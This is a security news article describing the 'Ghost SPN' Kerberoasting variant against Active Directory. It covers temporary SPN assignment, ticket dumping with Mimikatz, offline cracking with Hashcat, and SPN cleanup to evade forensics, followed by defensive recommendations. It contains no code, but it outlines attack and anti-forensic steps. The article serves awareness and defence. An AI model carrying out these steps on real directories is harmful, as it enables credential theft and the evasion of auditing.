Ghost SPN Attack Exploits Kerberos, Exposing User Passwords
Key Takeaways A new Kerberoasting variant, “Ghost SPN,” allows attackers to steal Active Directory credentials without leaving forensic traces. The attack abuses delegated administrative...
Key Takeaways
- A new Kerberoasting variant, “Ghost SPN,” allows attackers to steal Active Directory credentials without leaving forensic traces.
- The attack abuses delegated administrative permissions to temporarily assign Service Principal Names (SPNs) to ordinary user accounts.
- Traditional detection methods are often blind to Ghost SPN due to its ephemeral nature and lack of suspicious activity.
- Mitigation requires aggressive auditing of Active Directory ACLs, granular logging, and enforcing stronger Kerberos encryption.
Ghost SPN Attack Evades Detection to Steal Active Directory Credentials
A sophisticated new attack technique, dubbed “Ghost SPN,” has emerged as a significant threat to Active Directory (AD) environments. This advanced form of Kerberoasting enables attackers to compromise user credentials and then meticulously erase their tracks, effectively blinding conventional security systems to the intrusion.
Table Of Content
Security researchers at Trellix were instrumental in uncovering this method, which leverages delegated administrative permissions to create fleeting windows of vulnerability within an organization’s directory services.
Understanding Kerberoasting and the Ghost SPN Evolution
Kerberoasting is a well-established post-exploitation tactic used to target Active Directory accounts that have been associated with Service Principal Names (SPNs). When a Kerberos Ticket Granting Service (TGS) ticket is requested for an SPN, the Kerberos Key Distribution Center (KDC) encrypts this ticket using the target account’s NTLM hash. Attackers can then extract this encrypted ticket and attempt to crack the hash offline to reveal plaintext passwords.
The Ghost SPN variant dramatically escalates this threat. Rather than simply identifying and exploiting pre-existing service accounts, adversaries capitalize on delegated directory permissions, such as GenericAll object-level write access. This allows them to temporarily assign a fake SPN to a regular user account. This maneuver transforms a standard user into a transient Kerberoasting target, bypassing typical enumeration-based alerts because no known service account is directly manipulated.
The Three-Phase Attack Lifecycle
According to Trellix researchers, the Ghost SPN attack unfolds in three distinct stages:
- SPN Assignment (Out-of-Band): In this initial phase, the attacker utilizes write access to manually assign an arbitrary SPN, such as
http/webapp, to a chosen target account via PowerShell commandlets. The KDC processes this as a legitimate service principal, issuing a TGS ticket encrypted with RC4-HMAC-MD5. Crucially, this action appears as standard Kerberos behavior, with no anomalies detectable at the protocol level. - Extraction and Offline Cracking: The issued TGS ticket is subsequently dumped using tools like Mimikatz and exported as a
.kirbifile. The cracking process occurs entirely outside the compromised network environment, leveraging tools such as Hashcat ortgsrepcrack.py. This external operation ensures that no authentication failures or suspicious login attempts are generated within the target infrastructure. - Cleanup and Anti-Forensics: Immediately after ticket extraction, the attacker clears the SPN attribute, reverting the account to its original state. This rapid cleanup leaves no persistent indicators, making it exceptionally difficult for defenders relying on static directory snapshots or low-fidelity audit logs to retrospectively link the TGS request to malicious activity.
This technique directly undermines established detection models that operate under two critical flawed assumptions: first, that Kerberoasting targets are always pre-registered service accounts, and second, that malicious activity will invariably generate a high volume of anomalous ticket requests. The target account may never have been a service account, and the SPN might exist for mere seconds. When viewed in isolation, this activity is virtually indistinguishable from a legitimate administrative action, creating a significant visibility gap for Security Operations Centers (SOCs) that depend on fragmented log analysis.
What You Should Do
Organizations must adopt proactive measures to defend against Ghost SPN and similar attacks:
- Aggressively Audit ACLs: Regularly identify and revoke
GenericAllorWriteSPNpermissions granted to non-administrative accounts within Active Directory. - Enable Granular AD Change Logging: Implement detailed logging to correlate
msDS-ServicePrincipalNameattribute modifications with subsequent Kerberos ticket requests. - Enforce AES-Only Kerberos Encryption: Eliminate the use of RC4-HMAC-MD5 encryption, which is considerably more susceptible to offline cracking, by enforcing AES-only Kerberos encryption.
- Reset Compromised Account Passwords: Prioritize password resets for any accounts that have had historical write-access exposure to privileged objects.
- Deploy Behavioral NDR Tooling: Augment security stacks with behavioral Network Detection and Response (NDR) solutions, as static signature matching and SIEM-only approaches are insufficient for detecting ephemeral identity manipulation without comprehensive, cross-domain telemetry.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.